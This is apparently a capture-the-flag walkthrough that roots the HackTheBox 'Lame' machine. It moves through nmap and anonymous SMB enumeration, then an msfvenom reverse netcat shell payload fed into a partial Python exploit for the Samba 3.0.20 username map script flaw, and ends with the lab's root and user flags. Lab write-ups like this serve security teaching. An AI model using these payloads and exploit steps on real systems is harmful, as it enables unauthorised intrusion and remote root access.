HackTheBox Write-up — Lame
Introduction
This article will be a walkthrough on the methodology that was used to gain root access on the Linux machine named “Lame” on HackTheBox platform.
Disclaimer As with all things related to ethical hacking, this machine is an intentionally vulnerable machine, whose purpose is to learn ethical hacking techniques. The techniques mentioned should NOT be used for illegal purposes, and should NOT be used on machines without prior authorization from the machine owner.
Methodology
Scanning and Enumeration
Let’s connect to the vpn network if you haven’t yet. I have already connected to my network, and my IP is at 10.10.14.6. The target machine should be present at 10.10.10.3.
Let’s scan all the TCP ports, to find interesting information present on those ports:
> sudo nmap -sS -T4 -p- -A 10.10.10.3 -oA scanningAndEnumeration/lameTcpPortsAll
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2020–12–11 12:32 EST
Nmap scan report for 10.10.10.3
Host is up (0.27s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 — secure, fast, stable
|End of status
<!==snip==
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4–1ubuntu4))<!==snip==
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linuxkernel
Host script results:
|clock-skew: mean: 2h33m59s, deviation: 3h32m11s, median: 3m56s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
| System time: 2020–12–11T12:42:49–05:00
| smb-security-mode:
| accountused: guest
| authenticationlevel: user
| challengeresponse: supported
| messagesigning: disabled (dangerous, but default)
|smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 268.37 ms 10.10.14.1
2 268.31 ms 10.10.10.3
<!==snip==
We see a lot ports open here. For example, we now know that its a Linux machine (Looking at the smb-os-discovery nmap script output). It is also running SSH and SMB (Samba). We could try to connect to an SMB share using smbclient:
> smbclient -L \\\\\\\10.10.10.3\\\
Enter WORKGROUP\\kali’s password:
Anonymous login successful
Sharename Type Comment
— — — — — — — — — — -
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
— — — — — — — — -
Workgroup Master
— — — — — — — — -
WORKGROUP LAME
We are able to connect as an anonymous user! This is a serious issue, and should definitely be addressed to the client, if this were an actual penetration test. Let’s try connecting to the temporary folder /tmp on the victim machine
> smbclient -N \\\\\\\10.10.10.3\\\tmp
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \\ ls
. D 0 Sat Dec 12 03:23:07 2020
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sat Dec 12 02:19:02 2020
vmware-root DR 0 Sat Dec 12 02:19:34 2020
.X11-unix DH 0 Sat Dec 12 02:19:29 2020
.X0-lock HR 11 Sat Dec 12 02:19:29 2020
5562.jsvcup R 0 Sat Dec 12 02:20:07 2020
vgauthsvclog.txt.0 R 1600 Sat Dec 12 02:19:00 2020
7282168 blocks of size 1024. 5386548 blocks available
We see a bunch of files present here, but nothing of interesting nature. We could try to upload files as well, by using the “put” command.
> Create a file named test.txt
(kali㉿kali)-[~/peh/lame]
└─$ echo “hello” test.txt
> Upload test.txt
┌──(kali㉿kali)-[~/peh/lame]
└─$ smbclient -N \\\\\\\\10.10.10.3\\\\tmp
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \ put test.txt
putting file test.txt as \\test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \ ls
. D 0 Sat Dec 12 03:24:58 2020
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sat Dec 12 02:19:02 2020
vmware-root DR 0 Sat Dec 12 02:19:34 2020
.X11-unix DH 0 Sat Dec 12 02:19:29 2020
.X0-lock HR 11 Sat Dec 12 02:19:29 2020
5562.jsvcup R 0 Sat Dec 12 02:20:07 2020
test.txt A 6 Sat Dec 12 03:24:58 2020
vgauthsvclog.txt.0 R 1600 Sat Dec 12 02:19:00 2020
7282168 blocks of size 1024. 5386544 blocks available
The file was uploaded successfully ! That’s bad security practices. Address this immediately to the client!
We could enumerate even further to gather additional information (And you should, if this were a real pentest). But now, let’s get to the next phase of our test — Exploitation.
Exploitation
We have a nifty tool on Kali called “searchsploit”, that automatically searches for an exploit on the local machine, using a given keyword.
> searchsploit samba 3.0.20
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploit Title | Path
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Samba 3.0.10 < 3.3.5 — Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 — ‘Username’ map script’ Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 — Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 — Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) — Denial of Service (PoC) | linuxx86/dos/36741.py
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Shellcodes: No Results
This exploit is written in ruby, and can be used against the target. A little bit of googling, and you may come across another version on github that does the same thing, but it is written in python. Reference — https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851#file-samba-usermap-exploit-py
Let’s create our shellcode:
msfvenom -p cmd/unix/reversenetcat LHOST=10.10.14.6 LPORT=9999 -f python
Done!. Now replace the shellcode into the python exploit from earlier, and you would get a shell!. I have not pasted the entire code here, but you could take this as a reference.
!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smbstructs
smbstructs.SUPPORTSMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn’t have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module — [https://www.exploit-db.com/exploits/16320/](https://www.exploit-db.com/exploits/16320/)
< snip
\# Shellcode:
# msfvenom -p cmd/unix/reversenetcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = “”
buf += “\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6b”
<! — snip →
buf += “\\x20”
< snip
Let’s get our shell! This shell gives us root privileges.
Run the exploit:
python pySMBUserMap.py 10.10.10.3
Get a shell. Grab the root and user flags, and submit them to HTB.
(kali㉿kali)-[~]
└─$ nc -nvlp 9999
listening on [any] 9999 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.3] 57217
pwd
/
whoami
root
hostname
lame
root@lame:/root# cat root.txt
b2b3501b249d8040f5e5d316ed8fff14
root@lame:/root#
root@lame:/home/makis# cat user.txt
0e07ee8a05af02903c05cb84966bdfa7
root@lame:/home/makis#
That’s how you go about rooting this box. Hope this was helpful!